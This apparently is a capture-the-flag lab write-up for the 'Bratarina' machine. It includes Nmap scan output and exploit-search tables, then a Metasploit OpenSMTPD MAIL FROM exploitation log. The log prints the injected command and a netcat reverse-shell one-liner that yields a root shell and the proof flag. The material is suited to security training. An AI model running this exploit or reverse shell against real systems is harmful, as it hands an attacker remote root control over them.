Bratarina
Intro
# Nmap 7.94SVN scan initiated Fri Mar 22 09:11:34 2024 as: nmap -sC -sV -vv -oA nmap/initial bratarina.pg
Nmap scan report for bratarina.pg (192.168.202.71)
Host is up, received echo-reply ttl 61 (0.040s latency).
Scanned at 2024-03-22 09:11:36 CDT for 51s
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello bratarina.pg [192.168.45.152], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
53/tcp closed domain reset ttl 61
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 22038/tcp): CLEAN (Timeout)
| Check 2 (port 53384/tcp): CLEAN (Timeout)
| Check 3 (port 21897/udp): CLEAN (Timeout)
| Check 4 (port 39979/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-03-22T14:11:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: bratarina
| NetBIOS computer name: BRATARINA\x00
| Domain name: \x00
| FQDN: bratarina
|_ System time: 2024-03-22T10:11:52-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m35s, median: 1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 09:12:27 2024 -- 1 IP address (1 host up) scanned in 53.37 secondsOpen Ports
22/tcp - OpenSSH 7.6p1
25/tcp - OpenSMTPD
80/tcp - nginx 1.14.0
445/tcp - Samba smbd 4.7.6
OpenSMTPD Exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsSamba Exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | linux/dos/27778.txtInitial Foothold
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > show options
Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RCPT_TO root yes Valid mail recipient
RHOSTS bratarina.pg yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 25 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.45.152 yes The listen address (an interface may be specified)
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenSMTPD 6.4.0 - 6.6.1
View the full module info with the info, or info -d command.
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
[*] Started reverse TCP handler on 192.168.45.152:80
[*] 192.168.202.71:25 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.202.71:25 - The service is running, but could not be validated.
[*] 192.168.202.71:25 - Connecting to OpenSMTPD
[*] 192.168.202.71:25 - Saying hello and sending exploit
[*] 192.168.202.71:25 - Expecting: /220.*OpenSMTPD/
[*] 192.168.202.71:25 - Sending: HELO Fu9Gr5sSrBNw0zZ2a
[*] 192.168.202.71:25 - Expecting: /250.*pleased to meet you/
[*] 192.168.202.71:25 - Sending: MAIL FROM:<;for l in M Q e 4 o v 1 D j E T t 8 M;do read l;done;sh;exit 0;>
[*] 192.168.202.71:25 - Expecting: /250.*Ok/
[*] 192.168.202.71:25 - Sending: RCPT TO:<root>
[*] 192.168.202.71:25 - Expecting: /250.*Recipient ok/
[*] 192.168.202.71:25 - Sending: DATA
[*] 192.168.202.71:25 - Expecting: /354 Enter mail.*itself/
[*] 192.168.202.71:25 - Sending:
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/fnmudoa; nc 192.168.45.152 80 0</tmp/fnmudoa | /bin/sh >/tmp/fnmudoa 2>&1; rm /tmp/fnmudoa
[*] 192.168.202.71:25 - Sending: .
[*] 192.168.202.71:25 - Expecting: /250.*Message accepted for delivery/
[*] 192.168.202.71:25 - Sending: QUIT
[*] 192.168.202.71:25 - Expecting: /221.*Bye/
[*] Command shell session 1 opened (192.168.45.152:80 -> 192.168.202.71:42038) at 2024-03-22 10:06:00 -0500
whoami
root
pwd
/root
ls -la
total 28
drwx------ 4 root root 4096 Mar 22 10:08 .
drwxr-xr-x 23 root root 4096 Jul 6 2020 ..
-rw------- 1 root root 0 Jul 9 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jul 6 2020 .cache
drwx------ 3 root root 4096 Jul 6 2020 .gnupg
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Mar 22 10:08 proof.txt
cat proof.txt
470915275876f89210c9911a6fa0c973Privilege Escalation
No privilege escalation required as initial access gained by exploiting OpenSMTPD yielded root access.
Last updated